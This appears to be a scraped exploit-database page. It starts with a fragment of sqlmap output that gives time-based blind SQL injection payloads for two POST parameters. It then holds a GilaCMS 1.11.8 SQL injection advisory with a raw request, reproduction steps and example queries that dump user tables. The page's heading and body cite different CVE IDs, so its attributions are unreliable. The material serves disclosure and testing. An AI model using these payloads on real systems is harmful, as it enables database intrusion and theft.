        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: adminname=Admin' AND (SELECT 5969 FROM (SELECT(SLEEP(5)))vpfG) AND 'kOJS'='kOJS&username=admin&emailid=admin@test.com&mobilenumber=1234567899&update=
    ---
    ---
    Parameter: mobilenumber (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: adminname=Admin&username=admin&emailid=admin@test.com&mobilenumber=1234567899' AND (SELECT 1163 FROM (SELECT(SLEEP(5)))rdwj) AND 'mnwu'='mnwu&update=
    ---

CVE-2020-5307: OffSec’s Exploit Database Archive

Gila CMS 1.11.8 allows /admin/sql?query= SQL Injection.

Skip to content

**Product Owner:** GilaCMS

**Application Name:** GilaCMS 1.11.8

**CVE ID:** CVE-2020-5515

**Type:** Installable/Customer-Controlled Application

**Application Release Date:** 4th December,2019

**Severity:** High

**Authentication:** Required

**Complexity:** Easy

**Vulnerability Name:** SQL Injection in ‘/admin/sql?query=’

**Vulnerability Explanation:** SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.

**Verified In:**  
Firefox 71.0 (64-bit)  
Windows 10  
Hosted using XAMPP v3.2.4

**Request:**  
GET /gilacms/admin/sql?query={INJECTION_POINT} HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: GSESSIONID=1za7iusvgawzjs936iegtmmtwfghbbp6ectnugwb0clvc0z37u  
Upgrade-Insecure-Requests: 1

**Steps to Reproduce:**  
1\. Login to the GilaCMS application as admin.  
2\. Visit the following page: http://localhost/gilacms/admin/sql  

3\. Click on ‘Show Tables’. It takes us to http://localhost/gilacms/admin/sql?query=SHOW%20TABLES  

4\. The ‘query’ parameter is vulnerable to SQL injection (Inline Queries)  
http://localhost/gilacms/admin/sql?query=SELECT VERSION(),USER()  
  

http://localhost/gilacms/admin/sql?query=SELECT \* FROM user  

**Vulnerable Code:**  
The ‘query’ parameter sent in the GET request (http://localhost/gilacms/admin/sql) is vulnerable to SQL Injection.  

**Reference:**  
**Website:** https://gilacms.com/  
**GitHub Repository:** https://github.com/GilaCMS/gila  
**Download Version:** https://github.com/GilaCMS/gila/releases/tag/1.11.8

**Post navigation**

Tag

#firefox